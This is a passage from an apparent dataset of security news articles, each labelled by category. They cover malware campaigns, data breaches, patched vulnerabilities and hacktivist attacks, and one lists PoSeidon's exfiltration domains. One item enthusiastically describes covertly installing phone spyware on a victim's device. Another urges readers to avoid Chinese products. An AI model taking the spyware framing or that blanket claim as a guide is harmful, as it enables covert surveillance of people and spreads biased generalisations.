are very appealing; some even look very professional that they make it seem that you are close to having access to live programming. Researchers explain that the crooks rely on black hat SEO techniques to make sure that their malicious websites show up among the first in search engine results. The security firm has determined that close to 10,000 clicks have already been redirected to the fraudulent Olympics website.Overall, a number of 38,000 clicks have been redirected to such sites, the victims being spread out across 100 countries. Webroot advises that consumers should take a close look at the author of the app and then search the name to see if it is in fact a reputable company and/or developer, as seen in the photo above. A way that consumers can protect themselves from becoming a victim of these types of online scams is by learning about social engineering so they can recognize it and avoid falling into these traps. The official London 2012 mobile app can be downloaded from the site. ",Malware Malware Attack on South Korean Entities Was Work of Andariel Group,https://thehackernews.com/2021/06/malware-attack-on-south-korean-entities.html,"A malware campaign targeting South Korean entities that came to light earlier this year has been attributed to a North Korean nation-state hacking group called Andariel, once again indicating that Lazarus attackers are following the trends and their arsenal is in constant development. ""The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity,"" Russian cybersecurity firm Kaspersky said in a deep-dive published Tuesday. Victims of the attack are in the manufacturing, home network service, media, and construction sectors. Designated as part of the Lazarus constellation, Andariel is known for unleashing attacks on South Korean organizations and businesses using specifically tailored methods created for maximum effectivity. In September 2019, the sub-group, along with Lazarus and Bluenoroff, was sanctioned by the U.S. Treasury Department for their malicious cyber activity on critical infrastructure. Andariel is believed to have been active since at least May 2016. North Korea has been behind an increasingly orchestrated effort aimed at infiltrating computers of financial institutions in South Korea and around the world as well as staging cryptocurrency heists to fund the cash-strapped country in an attempt to circumvent the stranglehold of economic sanctions imposed to stop the development of its nuclear weapons program. The findings from Kaspersky build upon a previous report from Malwarebytes in April 2021, which documented a novel infection chain that distributed phishing emails weaponized with a macro embedded in a Word file that's executed upon opening in order to deploy malicious code concealed in the form of a bitmap (.BMP) image file to drop a remote access trojan (RAT) on targeted systems. According to the latest analysis, the threat actor, besides installing a backdoor, is also said to have delivered file-encrypting ransomware to one of its victims, implying a financial motive to the attacks. It's worth noting that Andariel has a track record of attempting to steal bank card information by hacking into ATMs to withdraw cash or sell customer information on the black market. ""This ransomware sample is custom made and specifically developed by the threat actor behind this attack,"" Kaspersky Senior Security Researcher Seongsu Park said. ""This ransomware is controlled by command line parameters and can either retrieve an encryption key from the C2 [server] or, alternatively, as an argument at launch time."" The ransomware is designed to encrypt all files in the machine with the exception of system-critical "".exe,"" "".dll,"" "".sys,"" "".msiins,"" and "".drv"" extensions in return for paying a bitcoin ransom to gain access to a decrypt tool and unique key to unlock the scrambled files. Kaspersky's attribution to Andariel stems from overlaps in the XOR-based decryption routine that have been incorporated into the group's tactics as early as 2018 and in the post-exploitation commands executed on victim machines. ""The Andariel group has continued to focus on targets in South Korea, but their tools and techniques have evolved considerably,"" Park said. ""The Andariel group intended to spread ransomware through this attack and, by doing so, they have underlined their place as a financially motivated state-sponsored actor."" ",Malware Chinese Android Smartphone comes with Pre-installed Spyware,https://thehackernews.com/2014/06/chinese-android-smartphone-comes-with.html,"If US has banned its several major government departments, including NASA, Justice and Commerce Departments, from purchasing Chinese products and computer technology due to suspected backdoors, then they are not wrong at all. A popular Chinese Android Smartphone comes pre-installed with a Trojan that could allow manufacturer to spy onto their users' comprising their personal data and conversations without any restrictions and users knowledge. GOOGLE PLAY STORE OR A SPYING APP? According to the researchers at the German security firm G Data, the Star N9500 smartphone, a popular and cheap handset device in China, comes pre-installed with Uupay.D Trojan horse, disguising as a version of the Google Play Store. The trojan camouflage as the Google Play Store, so it enables Chinese Company to secretly install malicious apps, which creates the whole spectrum of abuse. STEALING WITHOUT RESTRICTIONS The nasty Spyware runs in the background and has capability to steal personal information, copy users' data, record calls automatically with unlimited time and send costly SMS to premium services, thereby sending all the stolen information to an anonymous server based in China. The malware is also capable to activate the microphone on users' smartphone at any time in order to turn users' smartphone into a bugging device that allows hackers to hear anything you are saying near by the phone. ""The spy function is invisible to the user and cannot be deactivated,"" reads the blog post published yesterday. ""This means that online criminals have full access to the smartphone and all personal data. Logs that could make an access visible to the users are deleted directly."" REMOVAL OF THE TROJAN NOT POSSIBLE In addition, the malicious software allow preventing security updates from being downloaded and one can not disable the program. ""The program also blocks the installation of security updates,"" claimed G Data. Moreover, it is not possible to uninstall the trojan because it is embedded in the firmware of the Star-phone device. ""Unfortunately, removing the Trojan is not possible as it is part of the device's firmware and apps that fall into this category cannot be deleted,"" said Christian Geschkat, Product Manager at G Data. ""This includes the fake Google Play Store app of the N9500."" CHEAP PRICE ATTRACTS USERS The Star N9500 is an affordable copy of the Samsung Galaxy S4, which can be easily found at various online retailers such as eBay and Amazon for 130 to 165 euros and is also equipped with a variety of accessories, such as a second battery, car charger adapter and a second cover. But considering the high technological standard of device, the low price comes as a surprise and the security researchers at G DATA believe that it is the cheap price of the mobile device that has made possible by the subsequent selling of data records stolen from the smartphone owner. HOW TO CHECK IF YOU'RE AFFECTED We recommend you to download an up-to-date Mobile Anti-virus software and scan your device for the trojan and if found return the device back from where you purchased. Avoid buying Chinese and cheap products in order to keep your privacy and personal information away from the hands of cyber criminals and prying eyes. ",Malware "TripAdvisor travel website infected with Gamarue malware, infect 2% Indian Internet Users",https://thehackernews.com/2012/11/tripadvisor-travel-website-infected.html,"TripAdvisor Inc., a hotel-review website, recently became a victim of the bug, said Trend Micro Inc., an Internet security solutions provider. Many of TripAdvisor's users received spam mail with booking confirmations for hotels they had checked out on the website, 1.89% of Indian Internet Users have already been affected. The email purporting to be in the name of one of the Hotels has a similar theme to its English counterpart as it contains confirmation and details on an alleged booking reservation. TripAdvisor, which is among India's top five travel brands as per digital market research firm ComScore Inc., globally has 60 million unique monthly visitors and 2.4 million unique users per month in India. Gamarue is a family of malware that may be distributed by exploit kits, spammed emails or other malware, and has been observed stealing information from an affected user. Trend Micro reported that one of their manager received the spam at his personal e-mail address but the address mentioned in the mail was false as the actual hotel does not even exist in India. This made it clear that it was spam mail and nothing more than that. ""A lot of e-commerce websites pay the price of being popular. Online travel and hotel market has become an attractive target for cybercriminals given the large volume of transactions on hotel and online sites. A frequent traveler who has done a hotel booking or checked reviews recently, in all probability, would be prompted to click that mail. When a user clicks the attachment in this spam mail, the malware known as Gamarue becomes active. It can steal from an affected user any information left behind on the emails and saved on user's system"", said Suchita Vishnoi, Head Corporate Communications, Trend Micro. The online travel and hotel market has become an attractive target for cyber criminals given the large volume of transactions on hotel and airline sites. One should be very smart and cautious while replying to their mails and should always confirm their source. It is a very easy trick, yet effective. ",Malware Patched WinRAR Bug Still Under Active Attack—Thanks to No Auto-Updates,https://thehackernews.com/2019/03/winrar-hacking-malware.html,"Various cyber criminal groups and individual hackers are still exploiting a recently patched critical code execution vulnerability in WinRAR, a popular Windows file compression application with 500 million users worldwide. Why? Because the WinRAR software doesn't have an auto-update feature, which, unfortunately, leaves millions of its users vulnerable to cyber attacks. The critical vulnerability (CVE-2018-20250) that was patched late last month by the WinRAR team with the release of WinRAR version 5.70 beta 1 impacts all prior versions of WinRAR released over the past 19 years. For those unaware, the vulnerability is ""Absolute Path Traversal"" bug that resides in the old third-party library UNACEV2.DLL of WinRAR and allows attackers to extract a compressed executable file from the ACE archive to one of the Windows Startup folders, where the malicious file would automatically run on the next reboot. Therefore, to successfully exploit this vulnerability and take full control over the targeted computers, all an attacker needs to do is just convincing users into opening a maliciously-crafted compressed archive file using WinRAR. Immediately after the details and proof-of-concept (PoC) exploit code went public, malicious attackers started exploiting the vulnerability in a malspam email campaign to install malware on users' computers running the vulnerable version of the software. Now, security researchers from McAfee reported that they identified more than ""100 unique exploits and counting"" in the first week since the vulnerability was publicly disclosed, with most of the initial targets residing in the United States. One recent campaign spotted by the researchers piggybacks on a bootlegged copy of an Ariana Grande's hit album, which is currently being detected as malware by only 11 security products, whereas 53 antivirus products fail to alert their users at the time of writing. The malicious RAR file (Ariana_Grande-thank_u,_next(2019)_[320].rar) detected by McAfee extracts a list of harmless MP3 files to the victim's download folder but also drops a malicious EXE file to the startup folder, which has been designed to infect the targeted computer with malware. ""When a vulnerable version of WinRAR is used to extract the contents of this archive, a malicious payload is created in the Startup folder behind the scenes,"" the researchers explain. ""User Access Control (UAC) is bypassed, so no alert is displayed to the user. The next time the system restarts, the malware is run."" Unfortunately, such campaigns are still ongoing, and the best way to protect yourself from such attacks is to update your system by installing the latest version of the WinRAR software as soon as possible and avoid opening files received from unknown sources. ",Malware British Airways Fined £183 Million Under GDPR Over 2018 Data Breach,https://thehackernews.com/2019/07/british-airways-breach-gdpr-fine.html,"Britain's Information Commissioner's Office (ICO) today hit British Airways with a record fine of £183 million for failing to protect the personal information of around half a million of its customers during last year's security breach. British Airways, who describes itself as ""The World's Favorite Airline,"" disclosed a breach last year that exposed personal details and credit-card numbers of up to 380,000 customers and lasted for more than two weeks. At the time, the company confirmed that customers who booked flights on its official website (ba.com) and British Airways mobile app between August 21 and September 5 had had their details stolen by attackers. The cyberattack was later attributed to the infamous Magecart threat actor, one of the most notorious hacking groups specialized in stealing credit card details from poorly-secured websites, especially online eCommerce platforms. Magecart hackers have been known for using digital credit card skimmer wherein they secretly insert a few lines of malicious code into the checkout page of a compromised website that captures payment details of customers and then sends it to a remote server. Besides British Airways, Magecart groups have also been responsible for card breaches on sites belonging to high-profile companies like TicketMaster, Newegg, as well as sites belonging to other small online merchants. In a statement released today, ICO said its extensive investigation found that a variety of information related to British Airways' customers was compromised by ""poor security arrangements"" at the company, including their names and addresses, log-ins, payment card data, and travel booking details. ""People's personal data is just that – personal. When an organization fails to protect it from loss, damage or theft, it is more than an inconvenience,"" Information Commissioner Elizabeth Denham said. ""That's why the law is clear – when you are entrusted with personal data, you must look after it. Those that don't will face scrutiny from my office to check they have taken appropriate steps to protect fundamental privacy rights."" However, ICO also said that British Airways has cooperated with its investigation and has made improvements to the security arrangements since the last year data breach came to light. Since the data breach happened after the EU's General Data Protection Regulation (GDPR) took effect on May 2018, the fine of £183.39 million has been imposed on British Airways, which is the equivalent of 1.5% of the company's worldwide turnover for its 2017 financial year but is still less than the possible maximum of 4%. In response to the ICO announcement, British Airways, owned by IAG, said the company was ""surprised and disappointed"" by the ICO penalty. ""British Airways responded quickly to a criminal act to steal customers' data,"" said British Airways chairman and chief executive Alex Cruz. ""We have found no evidence of fraud/fraudulent activity on accounts linked to the theft. We apologize to our customers for any inconvenience this event caused."" The company has 28 days to appeal the penalty. Until now, the most significant penalty by the UK's data protection watchdog was £500,000, which was imposed on Facebook last year for allowing political consultancy firm Cambridge Analytica to gather and misuse data of 87 million users improperly. The same penalty of £500,000 was also imposed on credit reporting agency Equifax last year for its 2017's massive data breach that exposed the personal and financial information of hundreds of millions of its customers. Since both the incidents in Facebook and Equifax occurred before GDPR took effect, £500,000 was the maximum penalty ICO can impose under the UK's old Data Protection Act. ",Data_Breaches iOS URL Scheme Could Let App-in-the-Middle Attackers Hijack Your Accounts,https://thehackernews.com/2019/07/ios-custom-url-scheme.html,"Security researchers have illustrated a new app-in-the-middle attack that could allow a malicious app installed on your iOS device to steal sensitive information from other apps by exploiting certain implementations of Custom URL Scheme. By default on Apple's iOS operating system, every app runs inside a sandbox of its own, which prevent all apps installed on the same device from accessing each other's data. However, Apple offers some methods that facilitate sending and receiving very limited data between applications. One such mechanism is called URL Scheme, also known as Deep Linking, that allows developers to let users launch their apps through URLs, like facetime://, whatsapp://, fb-messenger://. For example, when you click ""Sign in with Facebook"" within an e-commerce app, it directly launches the Facebook app installed on your device and automatically process the authentication. In the background, that e-commerce app actually triggers the URL Scheme for the Facebook app (fb://) and passes some context information required to process your login. Researchers at Trend Micro noticed that since Apple does not explicitly define which app can use what keywords for their Custom URL Scheme, multiple apps on an iOS device can use single URL Scheme—which eventually could trigger and pass sensitive data to a completely different app unexpectedly or maliciously. ""This vulnerability is particularly critical if the login process of app A is associated with app B,"" the researchers said. To demonstrate this, researchers illustrated an attack scenario, as shown in the image above, using an example of a Chinese retailer app ""Suning"" and its implementation of ""Login with WeChat"" feature, explaining how it is susceptible to hacking. In Short, when the Suning app users choose to access their e-commerce account using WeChat, it generates a login-request and sends it to the WeChat app installed on the same device using the iOS URL Scheme for the messaging app. WeChat app then requests a secret login token from its server and sends it back to the Suning app for authentication. Researchers found that since Suning always uses the same login-request query to request the secret token and WeChat does not authenticate the source of the login request, the implementation is vulnerable to the app-in-the-middle attack via the iOS URL Scheme, eventually allowing attackers gain unauthorized access to users' accounts. ""With the legitimate WeChat URL Scheme, a fake-WeChat can be crafted, and Suning will query the fake one for Login-Token. If the Suning app sends the query, then the fake app can capture its Login-Request URL Scheme. ""WeChat recognizes it, but it will not authenticate the source of the Login-Request. Instead, it will directly respond with a Login-Token to the source of the request. Unfortunately, the source could be a malicious app that is abusing the Suning URL scheme."" That means, a malicious app with the same Custom URL Scheme as a targeted application can trick other apps into sharing users' sensitive data with it or can perform unauthorized actions, potentially resulting in the loss of privacy, bill fraud, or exposure to pop-up ads. ""In our research, plenty of apps that our system audited were found taking advantage of this feature to show ads to victims. Potentially malicious apps would intentionally claim the URL Scheme associated with popular apps: wechat://, line://, fb://, fb-messenger://, etc. We identified some of these malicious apps,"" the researchers said. Since the exploitability of this vulnerability totally depends upon the way a URL Scheme has been implemented, app developers and popular platforms are recommended to review their apps and validate fix for untrusted requests. ",Vulnerability "Microsoft Patch Tuesday - 8 Security Updates, 4 critical vulnerabilities, including Internet Explorer zero-day",https://thehackernews.com/2013/10/October-Patch-Tuesday-Internet-Explorer-zero-day.html,"October is turning out to be a busy month for patches. This month also marks the 10-year anniversary of the Patch Tuesday program, which Microsoft started in October of 2003. Scheduled for tomorrow, Microsoft has announced that they will release eight security updates including four critical, addressing vulnerabilities in Microsoft Windows, Internet Explorer (IE), Microsoft Office and its other products. Bulletin 1 is almost certainly to a zero-day vulnerability CVE-2013-3893 that has been actively exploited by hackers in targeted attacks. Though Microsoft issued a temporary ""Fix it"" in September for the vulnerability, Bulletins 2, 3 and 4 address vulnerabilities in a wide range of Microsoft products, including Windows XP, 7 and 8, and Windows Server 2003, 2008 and 2012. Bulletins 5, 6 and 7 address vulnerabilities that could allow for remote code execution. Bulletin 8 addresses an information disclosure vulnerability in SIlverlight and is the least urgent of the eight patches. Microsoft's pre-release notice provides more details of the affected software packages. Adobe will also be releasing updates on Tuesday for Reader XI and Acrobat XI for Windows. Both are rated 2, which means it's a critical vulnerability, but not known to be in use. ",Vulnerability 13 Anonymous Members indicted and accused of participating in 'Operation Payback',https://thehackernews.com/2013/10/13-anonymous-members-indicted-and.html,"A U.S. Grand jury indicted and accused 13 members of the hacking group Anonymous for allegedly participating in the cyber attacks against a number of websites as an anti-copyright campaign called ""Operation Payback"" Hackers took down the sites by inflicting a denial of service, or DDoS, attack, including those belonging to the Recording Industry Association of America, Visa and MasterCard. The attacks were in retaliation for the shutdown of ""The Pirate Bay,"" a Sweden-based file-sharing website used to illegally download copyrighted material. The DDoS Campaign was later extended to Bank of America and credit card companies such as Visa and MasterCard after they refused to process payments for WikiLeaks. According to the indictment, the suspects are charged with conspiracy to intentionally cause damage to protected computers. Suspects downloaded and used software known as Low Orbit Ion Cannon, or LOIC, to launch distributed denial-of-service attacks, that flooded web servers with traffic and rendered sites unavailable for legitimate users. Those charged ranged in age from 21 to 65 and lived in 13 different U.S. States, named in the indictment were Dennis Owen Collins, Jeremy Leroy Heller, Chen Zhiwei, Joshua Phy, Ryan Russel Gubele, Robert Audubon Whitfield, Anthony Tadros, Geoffrey Kenneth Commander, Austen Stamm, Timothy Robert McLain, Wade Carl Williams and Thomas Bell. The court papers say that the hackers conspired to coordinate DDoS attacks in Internet Chat Relay (IRC) channels. The group caused an estimated $5,000 in damages and affected at least 10 protected computers. ""We do not forgive. We do not forget. Expect us,"" ",Cyber_Attack "New ""PoSeidon"" Point of Sale Malware Spotted in the Wild",https://thehackernews.com/2015/03/poseidon-point-of-sale-malware.html,"A new and terribly awful breed of Point-of-Sale (POS) malware has been spotted in the wild by the security researchers at Cisco's Talos Security Intelligence & Research Group that the team says is more sophisticated and nasty than previously seen Point of Sale malware. The Point-of-Sale malware, dubbed ""PoSeidon"", is designed in a way that it has the capabilities of both the infamous Zeus banking Trojan and BlackPOS malware which robbed Millions from US giant retailers, Target in 2013 and Home Depot in 2014. PoSeidon malware scrapes memory from Point of Sale terminals to search for card number sequences of principal card issuers like Visa, MasterCard, AMEX and Discover, and goes on using the Luhn algorithm to verify that credit or debit card numbers are valid. The malware then siphon the captured credit card data off to Russian (.ru) domains for harvesting and likely resale, the researchers say. ""PoSeidon is another in the growing number of malware targeting POS systems that demonstrate the sophisticated techniques and approaches of malware authors,"" researchers of Cisco's Security Solutions team wrote in a blog post. ""Attackers will continue to target POS systems and employ various obfuscation techniques in an attempt to avoid detection. As long as POS attacks continue to provide returns, attackers will continue to invest in innovation and development of new malware families."" The components of PoSeidon are illustrated in the diagram above. Poseidon Point of Sale malware comprises of a Loader binary that maintains persistence on the target machine in an attempt to survive reboots and user logouts. The Loader then receives other components from the command and control servers. A subsequently downloaded binary FindStr installs a Keylogger component which scans the memory of the PoS device for credit card number sequences. The identified numbers are verified using the Luhn algorithm and then encrypted and sent to one of the given exfiltration servers, majority of which belongs to Russian domains: linturefa.com xablopefgr.com tabidzuwek.com lacdileftre.ru tabidzuwek.com xablopefgr.com lacdileftre.ru weksrubaz.ru linturefa.ru mifastubiv.ru xablopefgr.ru tabidzuwek.ru In past few years, a number of Point of Sale malware has been spotted in the United States, collecting users' credit card magnetic stripe data, and selling them in underground black markets. Network administrators should remain vigilant and must adhere to industry best practices so that they can protect themselves against advancing Point of Sale malware threats, the researchers say. ",Malware "Mysterious malware that re-installs itself infected over 45,000 Android Phones",https://thehackernews.com/2019/10/remove-xhelper-android-malware.html,"Over the past few months, hundreds of Android users have been complaining online of a new piece of mysterious malware that hides on the infected devices and can reportedly reinstall itself even after users delete it, or factory reset their devices. Dubbed Xhelper, the malware has already infected more than 45,000 Android devices in just the last six months and is continuing to spread by infecting at least 2,400 devices on an average each month, according to the latest report published today by Symantec. Here below, I have collected excerpts from some comments that affected users shared on the online forums while asking for how to remove the Xhelper Android malware: ""xhelper regularly reinstalls itself, almost every day!"" ""the 'install apps from unknown sources' setting turns itself on."" ""I rebooted my phone and also wiped my phone yet the app xhelper came back."" ""Xhelper came pre-installed on the phone from China."" ""don't buy cheap brand phones."" From Where Xhelper Android Malware Comes? Though the Symantec researchers did not find the exact source from where the malicious app packed with the Xhelper malware comes in the first place, the security firm did suspect that a malicious system app pre-installed on Android devices from certain brands actually downloaded the malware. ""None of the samples we analysed were available on the Google Play Store, and while it is possible that the Xhelper malware is downloaded by users from unknown sources, we believe that may not be the only channel of distribution,"" Symantec researchers write in its report. ""From our telemetry, we have seen these apps installed more frequently on certain phone brands, which leads us to believe that the attackers may be focusing on specific brands."" In a separate report published two months ago by Malwarebytes, researchers believed that the Xhelper malware is being spread by ""web redirects"" or ""other shady websites"" that prompt users to download apps from untrusted third-party sources. How Does the Xhelper Malware Work? Once installed, Xhelper doesn't provide a regular user interface; instead, it gets installed as an application component that doesn't show up on the device's application launcher in an attempt to remain hidden from the users. In order to launch itself, Xhelper relies on some external events triggered by users, like connecting or disconnecting the infected device from a power supply, rebooting a device, or installing or uninstalling an app. Once launched, the malware connects to its remote command-and-control server over an encrypted channel and downloads additional payloads such as droppers, clickers, and rootkits on the compromised Android devices. ""We believe the pool of malware stored on the C&C server to be vast and varied in functionality, giving the attacker multiple options, including data theft or even complete takeover of the device,"" the researchers say. The researchers believe that the source code of Xhelper is still a work in progress, as some of its ""older variants included empty classes that were not implemented at the time, but the functionality is now fully enabled."" The Xhelper malware has been seen targeting Android smartphone users primarily in India, the United States, and Russia. Though many antivirus products for Android detect the Xhelper malware, they are yet not able to permanently remove or block it from getting itself reinstalled on the infected devices. Since the source of the malware is still unclear, Android users are recommended to take simple but effective precautions like: keep devices and apps up-to-date, avoid app downloads from unfamiliar sources, always pay close attention to the permissions requested by apps, frequently back up data, and install a good antivirus app that protects against this malware and similar threats. ",Malware Android Hackers will demonstrate Fully loaded Spying Applications & Mobile Botnet,https://thehackernews.com/2012/07/android-hackers-will-demonstrate-fully.html,"This Sunday, The Capital , New Delhi plays host to an International The Hackers Conference where blackhat hackers will discuss the challenges of cyber safety with security agencies. Your Smartphone is an always-on and always-connected digital extension of your life which will be used by attackers to covertly steal your sensitive data and spy on you. Mahesh, An Independent Security Researcher and Android Developer/Hacker will demonstrate ""Android Spy Agent"". This application allows us to remotely access the entire victim's personal information and even though the confidential data available in the android cell phone. The type of personal information includes the victim's contacts, call logs, messages, browser's history, GPS location and much more information directly available on the victim's cell phone. Many-a-times we think that is there any way by which we can read the private sms of anyone. So here is the solution Mr. Mahesh will present in The Hackers Conference 2012 platform with Hundreds of advance features. This application can also allow the attacker to remotely delete the data available on the victim's phone. In order to perfectly work this application you have to gain access to the victim's android cell phone for at least 20 seconds. You have to install the application and then restart the cell phone. After restart your application gets automatically started on the victim's cell phone. Now you can access the victim's cells information for any normal cell phone and get the response on it. The android spy agent will be hidden in the victim's cell phone and not allows the victim to easily uninstall or delete it from the cell. In Another Talk Android Hacker Aditya Gupta and Subho Halder will talk about ""All your Droids belong to me : A look into Mobile Security in 2012"". Researchers have developed and will Demonstrate malware for Android phones that can be used as a spam botnet. ""The talk is about Android Malwares, Botnets and all the crazy stuff you have been hearing in the past. We will give an inside view on how the black hat underground uses this, to earn 5-6 digit income per month . For this, We will start off by creating an Android Malware, and then will gradually move on to the Botnet Part."", Aditya Gupta said. Maintaining that a wide variety of services are being offered on the mobile platforms without proper security implementation, Anurag Kumar Jain and Devendra Shanbhag from Tata Consultancy Services will deliberate on the topic, ""Mobile Application Security Risk and Remediation"". They will highlight the need for application security in mobile applications, the threats in a mobile environment, key security issues that can creep in mobile applications, and suggests a secure development approach which can possibly safeguard mobile applications from becoming ""sitting ducks"" for attackers and mobile malware. Experts from countries like Iran and Argentina will share space with Indian speakers in the day-long discussion at the India Habitat Centre. Yet another important issue The Hackers Conference 2012 will deliberate on is the Internet censorship in India. For more details, go to www.thehackersconference.com ",Malware "Adobe Releases Critical Patches for Flash, Acrobat Reader, and Media Encoder",https://thehackernews.com/2019/05/adobe-software-updates.html,"Adobe today released its monthly software updates to patch a total of 87 security vulnerabilities in its Adobe Acrobat and Reader, Flash Player and Media Encoder, most of which could lead to arbitrary code execution attacks or worse. None of the flaws patched this month in Adobe products has been found exploited in the wild. Out of 87 total flaws, a whopping number of vulnerabilities (i.e., 84 in total) affect Adobe Acrobat and Reader applications alone, where 42 of them are critical and rest 42 are important in severity. Upon successful exploitation, all critical vulnerabilities in Adobe Acrobat and Reader software lead to arbitrary code execution, allowing attackers to take complete control over targeted systems. Adobe has released updated versions of Acrobat and Reader software for Windows and macOS operating systems to address these security vulnerabilities. The update for Adobe Flash Player, which will receive security patch updates until the end of 2020, comes this month with a patch for just one security vulnerability( CVE-2019-7837), which is critical in severity and affects Windows, macOS, Linux, and Chrome OS versions of the software. The third Adobe product that received patches this month is Media Encoder, a powerful tool that allows users to compress audio and/or video files to be played back across browsers and devices. Adobe has released Media Encoder version 13.1 that addresses two security vulnerabilities, one of which is critical (CVE-2019-7842) and leads to remote code execution while the second is an information disclosure flaw. Users of affected Adobe software for Windows, macOS, Linux, and Chrome OS are urged to update their software packages to the latest versions as soon as possible. If your system hasn't yet detected the availability of the new update automatically, you should manually install the update by choosing ""Help → Check for Updates"" in your Adobe Acrobat and Reader software. ",Vulnerability Warning — 5 New Trojanized Android Apps Spying On Users In Pakistan,https://thehackernews.com/2021/01/warning-5-new-trojanized-android-apps.html,"Cybersecurity researchers took the wraps off a new spyware operation targeting users in Pakistan that leverages trojanized versions of legitimate Android apps to carry out covert surveillance and espionage. Designed to masquerade apps such as the Pakistan Citizen Portal, a Muslim prayer-clock app called Pakistan Salat Time, Mobile Packages Pakistan, Registered SIMs Checker, and TPL Insurance, the malicious variants have been found to obfuscate their operations to stealthily download a payload in the form of an Android Dalvik executable (DEX) file. ""The DEX payload contains most of the malicious features, which include the ability to covertly exfiltrate sensitive data like the user's contact list and the full contents of SMS messages,"" Sophos threat researchers Pankaj Kohli and Andrew Brandt said. ""The app then sends this information to one of a small number of command-and-control websites hosted on servers located in eastern Europe."" Interestingly, the fake website of the Pakistan Citizen Portal was also prominently displayed in the form of a static image on the Trading Corporation of Pakistan (TCP) website, potentially in an attempt to lure unsuspecting users into downloading the malware-laced app. Visiting the TCP website (tcp.gov.pk) now shows the message ""Down for Maintenance."" Besides the aforementioned apps, Sophos researchers also discovered a separate app called Pakistan Chat that didn't have a benign analogue distributed via the Google Play Store. But the app was found to leverage the API of a legitimate chat service called ChatGum. Once installed, the app requests intrusive permissions, including the ability to access contacts, file system, location, microphone, and read SMS messages, which allow it to gather a wide swathe of data on a victim's device. All these apps have one singular purpose — to conduct covert surveillance and exfiltrate the data from a target device. In addition to sending the unique IMEI identifier, the DEX payload relays detailed profile information about the phone, location information, contact lists, the contents of text messages, call logs and the full directory listing of any internal or SD card storage on the device. Troublingly, the malicious Pakistan Citizen Portal app also transmits sensitive information such as users' computerized national identity card (CNIC) numbers, their passport details, and the username and password for Facebook and other accounts. ""The spying and covert surveillance capability of these modified Android apps highlight the dangers of spyware to smartphone users everywhere,"" Pankaj Kohli said. ""Cyber-adversaries target mobiles not just to get their hands on sensitive and personal information, but because they offer a real-time window into people's lives, their physical location, movements, and even live conversations taking place within listening range of the infected phone."" If anything, the development is yet another reason why users need to stick to trusted sources to download third-party apps, verify if an app is indeed built by a genuine developer, and carefully scrutinize app permissions before installation. ""In the current Android ecosystem, apps are cryptographically signed as a way to certify the code originates with a legitimate source, tying the app to its developer,"" the researchers concluded. ""However, Android doesn't do a good job exposing to the end user when a signed app's certificate isn't legitimate or doesn't validate. As such, users have no easy way of knowing if an app was indeed published by its genuine developer."" ""This allows threat actors to develop and publish fake versions of popular apps. The existence of a large number of app stores, and the freedom of users to install an app from practically anywhere makes it even harder to combat such threats."" ",Malware Anonymous threatened Estonian government with a possible cyber attack,https://thehackernews.com/2012/10/anonymous-threatened-estonian.html,"Anonymous Hackers AnonSwedenOp posted a video on YouTube on October 8 where it threatened the Estonian government with a possible cyber attack. ""Estonian government had sacrificed its own people instead of helping its own people, Estonian government has channelled money to helping Greece that is much better off."" ""Estonia says that it doesn't have money but then they give 357 million to Greece,"" the statement declares. Anonymous Group will most probably attack on Friday, October 12, according to video and this attack will go as Operation #OpEstonia. The the end of the Video, Hacker with the promise: ""This must end. Estonian people, we haven't forgotten you"". Anonymous Hacker last week took down the website of Swedish central bank also and this attack can also be on high rate, if they get possible massive number of attacks. Subscribe to our Daily Newsletter via email - Be First to know about Security and Hackers. or Join our Huge Hackers Community on Facebook, Google+ and Twitter. ",Cyber_Attack XSS attack on CIA (Central Itelligence Agency) Website by lionaneesh,https://thehackernews.com/2011/06/xss-attack-on-cia-central-itelligence.html,"XSS attack on CIA (Central Itelligence Agency) Website by lionaneesh After Ddos attack on CIA (Central Itelligence Agency) website by Lulzsec, lionaneesh, an Indian hacker have found XSS Vulnerability on same site as shown. The Vulnerabile link is here . You can join Loinaneesh on Twitter. ",Vulnerability Ethereum Classic (ETC) Hit by Double-Spend Attack Worth $1.1 Million,https://thehackernews.com/2019/01/ethereum-double-spend-attack.html,"Popular cryptocurrency exchange Coinbase has suspended all transactions of Ethereum Classic (ETC)—the original unforked version of the Ethereum network—on their trading platforms, other products and services after detecting a potential attack on the cryptocurrency network that let someone spend the same digital coins twice. Why is this attack concerning? The heist resulted in the loss of $1.1 million worth of the Ethereum Classic digital currency. The digital currency immediately fell in price after the news came out. Coinbase revealed Monday that it identified ""a deep chain reorganization"" of the Ethereum Classic blockchain (or 51 percent attack of the network), which means that someone controlling the majority of miners on the network (over 50%) had modified the transaction history. After reorganizing the Ethereum blockchain, the attackers were able to what's called ""double spend"" about 219,500 ETC by recovering previously spent coins from the rightful recipients and transferring them to new entities chosen by attackers (typically a wallet in their control). ""We observed repeated deep reorganizations of the Ethereum Classic blockchain, most of which contained double spends,"" Coinbase security engineer Mark Nesbitt said in a blog post. ""The total value of the double spends that we have observed thus far is 219,500 ETC (~$1.1M)."" Coinbase identified the deep chain reorganization of the Ethereum Classic blockchain on January 5, at which point the firm halted on-chain ETC payments in order to safeguard its customer funds and the cryptocurrency exchange itself. An update on status.coinbase.com reads: ""Due to unstable network conditions on the Ethereum Classic network, we have temporarily disabled all sends and receives for ETC. Buy and sell is not impacted. All other systems are operating normally."" It's worth noting that this incident was not a one-time event, as the attacks are apparently ongoing. Initially, Coinbase identified nine reorganizations containing double spends, amounted to 88,500 ETC (about $460,000), but the latest update on its blog post suggests that at least 12 additional reorganizations included double spends, totaling 219,500 ETC (nearly $1.1Million). At the time, it is not clear whom the attackers targeted, but Coinbase reassured its customers that the cryptocurrency exchange itself had not been the target of these attacks and that no customer funds were lost. Initially, Ethereum Classic denied the Coinbase claims, saying that the ETC network appeared to be ""operating normally,"" but hours later it confirmed the ""successful 51% attack"" on the Ethereum Classic network with ""multiple"" block reorganizations. However, Ethereum Classic said that Coinbase did not contact ETC personnel regarding the attack and added that the investigation is an ""ongoing process."" Since it is incredibly difficult or perhaps virtually impossible to mount such attacks against heavily-mined cryptocurrency networks like Bitcoin and Ethereum, attackers chose to target small-cap cryptocurrencies like Ethereum Classic, Litecoin Cash, Bitcoin Gold, ZenCash (now Horizen), and Verge. Created in June 2016, Ethereum Classic is the 18th-largest cryptocurrency with a market cap of over half a billion dollars (around $539 million), which makes it an attractive target for attackers. ",Cyber_Attack Have a D-Link Wireless Router? You might have been Hacked,https://thehackernews.com/2015/02/hacking-dlink-wireless-router.html,"The popular DSL wireless router model from D-Link are allegedly vulnerable to a software bug that could allow remote hackers to modify the DNS (Domain Name System) settings on affected routers and to hijack users' traffic. The main goal of DNS hijacking is to secretly redirect user's 